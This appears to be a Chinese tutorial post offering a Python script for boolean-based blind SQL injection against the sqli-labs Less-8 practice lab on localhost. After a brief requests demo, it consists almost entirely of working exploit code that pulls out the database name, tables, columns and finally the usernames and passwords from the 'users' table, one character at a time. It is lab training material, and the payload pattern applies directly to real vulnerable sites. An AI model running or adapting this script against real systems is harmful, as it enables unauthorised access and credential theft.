基于布尔的盲注入python脚本
# coding = utf-8 import requests url = 'http://www.baidu.com' ret = requests.get(url) print(type(ret)) # 返回类型 <class 'requests.models.Response'> print(ret) # 返回值:<Response [200]> print(ret.text) # 输出文本信息 print(ret.content) # 以二进制输出
1 # coding:utf-8 2 import requests 3 4 # 获取数据库名长度 5 def database_len(): 6 for i in range(1, 10): 7 url = '''http://127.0.0.1/sqli-labs/Less-8/index.php''' 8 payload = '''?id=1' and length(database())>%s''' % i 9 # print(url+payload+'%23') 10 r = requests.get(url + payload + '%23') 11 if 'You are in' in r.text: 12 print(i) 13 14 else: 15 # print('false') 16 print('database_length:', i) 17 break 18 19 20 database_len() 21 22 #获取数据库名 23 def database_name(): 24 name = '' 25 for j in range(1, 9): 26 for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz': 27 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" % ( 28 j, i) 29 # print(url+'%23') 30 r = requests.get(url + '%23') 31 if 'You are in' in r.text: 32 name = name + i 33 34 print(name) 35 36 break 37 print('database_name:', name) 38 39 40 database_name() 41 42 # 获取数据库表 43 def tables_name(): 44 name = '' 45 for j in range(1, 30): 46 for i in 'abcdefghijklmnopqrstuvwxyz,': 47 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" % ( 48 j, i) 49 r = requests.get(url + '%23') 50 if 'You are in' in r.text: 51 name = name + i 52 53 print(name) 54 55 break 56 print('table_name:', name) 57 58 59 tables_name() 60 61 62 # 获取表中字段 63 def columns_name(): 64 name = '' 65 for j in range(1, 30): 66 for i in 'abcdefghijklmnopqrstuvwxyz,': 67 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" % ( 68 j, i) 69 r = requests.get(url + '%23') 70 if 'You are in' in r.text: 71 name = name + i 72 73 print(name) 74 75 break 76 print('column_name:', name) 77 78 79 columns_name() 80 81 82 # 获取username 83 def username_value(): 84 name = '' 85 for j in range(1, 100): 86 for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-': 87 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" % ( 88 j, i) 89 r = requests.get(url + '%23') 90 if 'You are in' in r.text: 91 name = name + i 92 93 print(name) 94 95 break 96 print('username_value:', name) 97 98 99 username_value() 100 101 102 # 获取password 103 def password_value(): 104 name = '' 105 for j in range(1, 100): 106 for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-': 107 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" % ( 108 j, i) 109 r = requests.get(url + '%23') 110 if 'You are in' in r.text: 111 name = name + i 112 113 print(name) 114 115 break 116 print('password_value:', name) 117 118 119 password_value()